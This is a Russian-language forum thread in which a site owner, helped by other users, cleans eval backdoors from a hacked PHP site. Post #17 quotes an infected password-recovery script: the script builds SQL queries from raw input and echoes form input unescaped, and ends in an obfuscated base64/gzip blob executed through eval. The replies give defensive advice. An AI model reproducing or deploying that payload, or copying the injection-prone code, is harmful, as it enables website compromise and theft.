|
|
Регистрация Восстановить пароль |
Повторная активизация e-mail |
Регистрация | Задать вопрос |
Заплачу за решение |
Новые сообщения |
Сообщения за день |
Расширенный поиск |
Правила |
Всё прочитано |
|
|
Опции темы | Поиск в этой теме |
27.02.2018, 00:15 | #11 |
Старожил
Регистрация: 12.01.2011
Сообщений: 19,500
|
Странная строка, вы случайно не кинули программиста реализовывавшего проект?)
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом. |
27.02.2018, 01:09 | #12 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Нет)
|
27.02.2018, 01:47 | #13 |
Старожил
Регистрация: 28.01.2009
Сообщений: 21,000
|
в любом случае вам по сути оставили backdoor.
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел. Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите. |
27.02.2018, 01:54 | #14 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Ещё один eval нашел,удалил тоже. Буду дальше искать
|
27.02.2018, 07:58 | #15 |
Старожил
Регистрация: 15.02.2010
Сообщений: 15,709
|
Вам не евалы искать надо, а ДЫРУ, через которую стало возможно редактировать ваши php файлы (если, конечно, они изначально были чистые).
|
27.02.2018, 13:30 | #16 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Спасибо
|
27.02.2018, 15:55 | #17 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Что скажите на это? Очень много кода base64
Одна из дыр я так понимаю? <?PHP ################################### ### ################################### ### $_OPTIMIZATION["title"] = "Восстановление пароля"; $_OPTIMIZATION["description"] = "Восстановление забытого пароля"; $_OPTIMIZATION["keywords"] = "Восстановление забытого пароля"; if(isset($_SESSION["user_id"])){ Header("Location: /account/pole"); return; } ?> <div class="silver-bk5"><div class="clr"></div> <div class="autoriz2"> <?PHP if(isset($_POST["email"])){ $email = $func->IsMail($_POST["email"]); $time = time(); $tdel = $time + 60*15; if($email !== false){ $db->Query("DELETE FROM db_recovery WHERE date_del < '$time'"); $db->Query("SELECT COUNT(*) FROM db_recovery WHERE ip = INET_ATON('".$func->UserIP."') OR email = '$email'"); if($db->FetchRow() == 0){ $db->Query("SELECT id, user, email, pass FROM db_users_a WHERE email = '$email'"); if($db->NumRows() == 1){ $db_q = $db->FetchArray(); $rn = rand(515165115, 999999999999); $new_pass = $func->md5Password($rn); # Вносим запись в БД $db->Query("INSERT INTO db_recovery (email, ip, date_add, date_del) VALUES ('$email',INET_ATON('".$func->UserIP."'),'$time','$tdel')"); $db->Query("UPDATE ".$pref."_users_a SET pass = '$new_pass' WHERE email = '".$db_q["email"]."'"); # Отправляем пароль $sender = new isender; $sender -> RecoveryPassword($db_q["email"], $rn, $db_q["email"]); echo "<div class='h-title2'><font color = 'green'><b>Пароль отправлен на Email</b></font></div>"; ?> </div> <div class="clr"></div> <?PHP return; }else echo "<div class='h-title2'><font color = 'red'><b>Такой Email не найден</b></font></div>"; }else echo "<div class='h-title2'><font color = 'red'><b>Попробуйте через 15 минут</b></font></div>"; }else echo "<div class='h-title2'><font color = 'red'><b>Email указан неверно</b></font></div>"; } ?> <h3><font color = 'white'>Восстановление доступа!</font></h3> <BR /> <form action="" method="post"><BR /> <table width="188" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="left" width="205"><input name="email" type="text" placeholder="Email для отправки пароля" size="25" maxlength="50" class="lg" style=" margin-top:0px;" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td> </tr> <tr> <td colspan="2" align="center"><BR /><input type="submit" value="Отправить" style="height: 65px; margin-top:-10px; " class="btn_in"></td> </tr> </table> </form> </div> <div id="link1" style=" width: 400px; height: 445px; position: absolute; top: 300px; left: 50%; margin-left: -470px; background: url('../img/boy.png') 0 0 no-repeat; z-index: 10; cursor: pointer; "></div> </div> <div class="clr"></div> <?php $J8E334118BC68B37DF94B539152B4D4F0= "eNqVVM2SszYQfKSAZFLm8B3CImFjI1ZCP0 g3kFyLQRjyLRsMTx8eIJfcpmqmp2e6euZzP 50/YTLZj7+Gqk9S0l9PtMcfdL++mbhGJSq2Ykc 7GWhEdoNo/xdgHG2fVe75C6sGFpsA8d9U4In2fqWhP8mU bkzEuQnzrJHk2YCv3yJws8TONEi+bHY+NZ5 tbltgm9q9UDErlY5MZq43IKkdw7vwHZC9Do sXvjfK/9Dg4MlwVoVkE7XBtnZCBN29CPKyQnPKRdzY bJ6qnlx1jyCrJRU836wcdsoJa17zLLMQ3MJ uLS/sJrwkNsAl7XPNBxuWaFmbl5+qkXTcs7lB7K dCHW9AWFjpdrK7zzY4Qw7ijAanrRXOONn9Q 14WtuH8u+nzWdUeNyLvGEygGRyseLK4A8fH uaKhq6ln3GVyaYcO8Zf/rC5yZNxf+BBPzcUdvHlfYowftT+VWfR+vA7 MjncC1tAEUVFByVyfv1tFpiqIVqUiqJCvZc 2ugqNV9Ob9UF0ghjwi8roeMyoX5qsZ39+EM 03gFAo5bXLoNicOLhUrmyYn1RMiUBeJvdga 0WmWmmcVysYBFFDlXo1aaBUyLTnuGTLwwbv ZXYaIBWJrvcyJWALrcaTwXMsxekvkpQX420 pz5H0pZC4eo580iJTNYirVsjKOf6haTnRkd 4Gxdh/nt+kJ09WStv0AVG8hr9mHU3Jp1HD0SfRDRG 8NZ91k5ufQnAjMjH4lpBjC2obTWgHCKtB1P JgvGn6FLIuJQ/5p1QxasK4WIyhHPxvg+nY878eOs0EYuFTWA tjNpg4bxL71EN/IroEelufhudmC67sRklZY/7a1n257AhTu5qLOQ4YWaGSSa3l4bIwCKubM DTqSdVI8Lmayx01VyNzK7BoVgUu0lLrxvi9 UGNLAQCfO74abu00N5dDNek+k6LvBYleWtQ O09ruEdNciLlogzSPFeXm5wirojpv0kVZh0 cj5+UiTt+Mu5cAgM7IT2fHqPAJWaSiey9jW Btx2+ebP5c92i/v7oc8dashTlrQfZ2j24FkCCbRaJz3i3XAd1 IB5DeLBVN3r8ZI/R7zYS+4tLP6j5ut//Y9bNcw3/v3H59evX/8CmF6DXw==";eval(base64_decode(gzun compress(base64_decode($J8E334118BC 68B37DF94B539152B4D4F0))));?> Последний раз редактировалось Сергей 163; 27.02.2018 в 16:01. |
27.02.2018, 15:58 | #18 |
Александр
Администратор
Регистрация: 28.10.2006
Сообщений: 17,501
|
Дыры это дыры на сервере, может пароль подобрали, или у вас есть загрузка файлов на сервер и загрузили PHP или другой исполняемый скрипт.
что нужно делать. не разрешать загрузку на сайт. переустановить всё заного. новая ОС, восстановление из бекапа скрипта без вирусов, проблем. правильно настроить ОС, доступ к файлам, если что-то создается кому как разрешено что исполнять. подключаться к серверу только по шифрованным протоколам типа SFTP и т.д. |
27.02.2018, 16:01 | #19 |
Старожил
Регистрация: 12.01.2011
Сообщений: 19,500
|
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом. |
27.02.2018, 16:02 | #20 |
Александр
Администратор
Регистрация: 28.10.2006
Сообщений: 17,501
|
Ну тогда обязательно перейти на VPS, шаред хостинг с соседних сайтов легко взламывается.
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Взломали системный файл hosts | Restman | Общие вопросы C/C++ | 2 | 18.07.2015 05:35 |
Взломали сайт | ruslan0 | Безопасность, Шифрование | 6 | 01.10.2011 18:34 |
Взломали почту на яндексе, что делать? | Яр|/||< (^_^) | Безопасность, Шифрование | 4 | 17.07.2010 20:53 |
QIP взломали | OrdJONY | Свободное общение | 12 | 09.05.2009 12:12 |